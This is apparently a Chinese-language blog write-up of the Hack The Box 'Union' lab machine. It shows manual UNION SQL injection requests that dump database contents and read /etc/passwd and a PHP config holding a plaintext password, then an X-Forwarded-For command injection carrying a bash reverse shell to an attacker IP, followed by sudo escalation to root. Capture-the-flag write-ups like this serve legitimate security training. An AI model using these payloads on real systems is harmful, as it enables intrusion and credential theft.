Union-htb-writeup

0x00 靶场技能介绍

章节技能:手工SQL注入、SQL注入load_file函数利用、网站文件代码分析、XFF命令执行

参考链接:https://pencer.io/ctf/ctf-htb-union/#reverse-shell

参考链接:https://0xdf.gitlab.io/2021/11/22/htb-union.html

0x01 用户权限获取

1、靶机介绍

关于 Union
Union 是一台中等难度的 Linux 机器,其 Web 应用程序易受 SQL 注入攻击。机器上设有过滤器,可防止 SQLMap 转储数据库。用户需要手动编写 union 语句,以从数据库和网站源代码中提取信息。数据库包含一个标志,可用于对机器进行身份验证,在身份验证后,Web 服务器将运行 iptables 命令以启用端口 22。SSH 的凭据位于用于对 MySQL 进行身份验证的 PHP 配置文件中。进入机器后,用户可以检查 Web 应用程序的源代码,并通过设置 X-FORWARDED-FOR 标头来发现,他们可以对 Web 服务器用于将 IP 地址列入白名单的系统命令执行命令注入。

2、测试下靶机连通率

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿offsec)-[~/Desktop]
└─$ ping 10.10.11.128 -c 4
PING 10.10.11.128 (10.10.11.128) 56(84) bytes of data.
64 bytes from 10.10.11.128: icmp_seq=1 ttl=63 time=146 ms
64 bytes from 10.10.11.128: icmp_seq=2 ttl=63 time=102 ms
64 bytes from 10.10.11.128: icmp_seq=3 ttl=63 time=116 ms
64 bytes from 10.10.11.128: icmp_seq=4 ttl=63 time=116 ms

--- 10.10.11.128 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3000ms
rtt min/avg/max/mdev = 102.477/119.972/145.730/15.840 ms

3、扫描下开放端口情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- -Pn --min-rate=10000 -oG allports 10.10.11.128
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 09:33 CST
Nmap scan report for 10.10.11.128
Host is up (0.50s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 17.14 seconds
                                                                                                                                                           
┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
80,                                                                                                                                                           
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -Pn -sV -sC 10.10.11.128 -p 80 -oN PortList.txt --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 09:34 CST
Nmap scan report for 10.10.11.128
Host is up (0.79s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.97 seconds

4、只开放了一个端口,那就访问下吧

http://10.10.11.128/

5、这里经过初步尝试,疑似存在SQL注入漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /index.php HTTP/1.1
Host: 10.10.11.128
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 21
Origin: http://10.10.11.128
Connection: close
Referer: http://10.10.11.128/
Cookie: PHPSESSID=jv95ej2q3d1mmegka4qv15ikj8

player=shiyan';-- -';

6、查询当前用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /index.php HTTP/1.1
Host: 10.10.11.128
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 33
Origin: http://10.10.11.128
Connection: close
Referer: http://10.10.11.128/
Cookie: PHPSESSID=jv95ej2q3d1mmegka4qv15ikj8

player=' union select user();-- -

7、查询数据库名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /index.php HTTP/1.1
Host: 10.10.11.128
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 85
Origin: http://10.10.11.128
Connection: close
Referer: http://10.10.11.128/
Cookie: PHPSESSID=jv95ej2q3d1mmegka4qv15ikj8

player=' union select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.schemata;-- -

8、查询表名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /index.php HTTP/1.1
Host: 10.10.11.128
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 112
Origin: http://10.10.11.128
Connection: close
Referer: http://10.10.11.128/
Cookie: PHPSESSID=jv95ej2q3d1mmegka4qv15ikj8

player=' union select group_concat(table_name) from INFORMATION_SCHEMA.tables where table_schema='november';-- -

9、查询列名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /index.php HTTP/1.1
Host: 10.10.11.128
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 131
Origin: http://10.10.11.128
Connection: close
Referer: http://10.10.11.128/
Cookie: PHPSESSID=jv95ej2q3d1mmegka4qv15ikj8

player=' union select group_concat(table_name, ':', column_name) from INFORMATION_SCHEMA.columns where table_schema='november';-- -

10、查询flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /index.php HTTP/1.1
Host: 10.10.11.128
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 54
Origin: http://10.10.11.128
Connection: close
Referer: http://10.10.11.128/
Cookie: PHPSESSID=jv95ej2q3d1mmegka4qv15ikj8

player=' union select group_concat(one) from flag;-- -

11、查询play的值内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /index.php HTTP/1.1
Host: 10.10.11.128
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60
Origin: http://10.10.11.128
Connection: close
Referer: http://10.10.11.128/
Cookie: PHPSESSID=jv95ej2q3d1mmegka4qv15ikj8

player=' union select group_concat(player) from players;-- -

12、我们把获取的flag值在该页面上进行输入

13、页面会跳转到 /firewall.php 页面下

14、在跳转后的页面上继续输入flag信息

http://10.10.11.128/firewall.php

1
2
3
Join the UHC - November Qualifiers
Welcome Back!
Your IP Address has now been granted SSH Access.

15、那我们继续扫描下这个端口是否开放吧

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿offsec)-[~/Desktop]
└─$ nmap -p 22 10.10.11.128
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 10:08 CST
Nmap scan report for 10.10.11.128
Host is up (0.16s latency).

PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 0.46 seconds

16、确实开放 了,那我们得获取到本地的账号密码信息才行,这里先利用SQL注入读取下password文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /index.php HTTP/1.1
Host: 10.10.11.128
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: http://10.10.11.128
Connection: close
Referer: http://10.10.11.128/
Cookie: PHPSESSID=jv95ej2q3d1mmegka4qv15ikj8

player=' union select load_file('/etc/passwd');--

17、读取下网站的配置信息看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /index.php HTTP/1.1
Host: 10.10.11.128
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 64
Origin: http://10.10.11.128
Connection: close
Referer: http://10.10.11.128/
Cookie: PHPSESSID=jv95ej2q3d1mmegka4qv15ikj8

player=' union select load_file('/var/www/html/config.php');-- -

1
2
3
4
5
6
7
8
9
10
Sorry, <?php
  session_start();
  $servername = "127.0.0.1";
  $username = "uhc";
  $password = "uhc-11qual-global-pw";
  $dbname = "november";

  $conn = new mysqli($servername, $username, $password, $dbname);
?>
 you are not eligible due to already qualifying.

18、到这里,我们尝试使用该账号密码去登录系统

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh uhc@10.10.11.128             
The authenticity of host '10.10.11.128 (10.10.11.128)' can't be established.
ED25519 key fingerprint is SHA256:hE6H4DrsHebfs+gclhz9SL77tMpy8aKR3vp8Y0NRDvY.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:29: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.128' (ED25519) to the list of known hosts.
uhc@10.10.11.128's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Nov  8 21:19:42 2021 from 10.10.14.8
uhc@union:~$ id
uid=1001(uhc) gid=1001(uhc) groups=1001(uhc)
uhc@union:~$

19、OK的,那获取下第一个flag信息吧

1
2
3
4
5
uhc@union:~$ ls
user.txt
uhc@union:~$ cat user.txt 
9607b165bcfc305203fff898dfbff15d
uhc@union:~$

0x02 系统权限获取

20、我们在分析网站的 firewall.php 文件时,发现该文件可以命令执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
uhc@union:~$ cd /var/www/html/
uhc@union:/var/www/html$ ls -la
total 16
drwxr-xr-x 1 root root   94 Nov  8  2021 .
drwxr-xr-x 1 root root    8 Jul  2  2021 ..
-rw-r--r-- 1 htb  htb  1203 Nov  5  2021 challenge.php
-rw-r--r-- 1 htb  htb   207 Nov  4  2021 config.php
drwxr-xr-x 1 htb  htb    34 Nov  4  2021 css
-rw-r--r-- 1 htb  htb  1028 Nov  5  2021 firewall.php
-rw-r--r-- 1 htb  htb  2093 Nov  4  2021 index.php
uhc@union:/var/www/html$ cat firewall.php 
<?php
require('config.php');

if (!($_SESSION['Authenticated'])) {
  echo "Access Denied";
  exit;
}

?>
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->

<div class="container">
                <h1 class="text-center m-5">Join the UHC - November Qualifiers</h1>

        </div>
        <section class="bg-dark text-center p-5 mt-4">
                <div class="container p-5">
<?php
  if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
  } else {
    $ip = $_SERVER['REMOTE_ADDR'];
  };
  system("sudo /usr/sbin/iptables -A INPUT -s " . $ip . " -j ACCEPT");
?>
              <h1 class="text-white">Welcome Back!</h1>
              <h3 class="text-white">Your IP Address has now been granted SSH Access.</h3>
                </div>
        </section>
</div>
uhc@union:/var/www/html$

21、这里对用户的输入没有过滤,导致产生命令执行漏洞,下面尝试利用下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌─[us-vip-22]─[10.10.14.2]─[shiyan@htb-lnf0ywzdjr]─[~/Desktop]
└──╼ [★]$ curl -X GET -H 'X-FORWARDED-FOR: ;bash -c "bash -i >& /dev/tcp/10.10.14.2/4444 0>&1";' --cookie "PHPSESSID=vflfp91f6ua2otqaa2unqdrd4v" 'http://10.10.11.128/firewall.php'

┌─[us-vip-22]─[10.10.14.2]─[shiyan@htb-lnf0ywzdjr]─[~/Desktop]
└──╼ [★]$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.128] 49146
bash: cannot set terminal process group (718): Inappropriate ioctl for device
bash: no job control in this shell
www-data@union:~/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on union:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on union:
    (ALL : ALL) NOPASSWD: ALL
www-data@union:~/html$

22、呢就获取下最终的flag信息吧

1
2
3
4
5
6
7
8
9
10
www-data@union:~/html$ sudo -i
sudo -i
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
root.txt
snap
cat root.txt
15f16a14142dfe8f004cfccdc32f8cdb

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/418

打靶记
#shooting-range
Union-htb-writeup
https://sh1yan.top/2024/10/13/Union-htb-writeup/
作者
shiyan
发布于
2024年10月13日
许可协议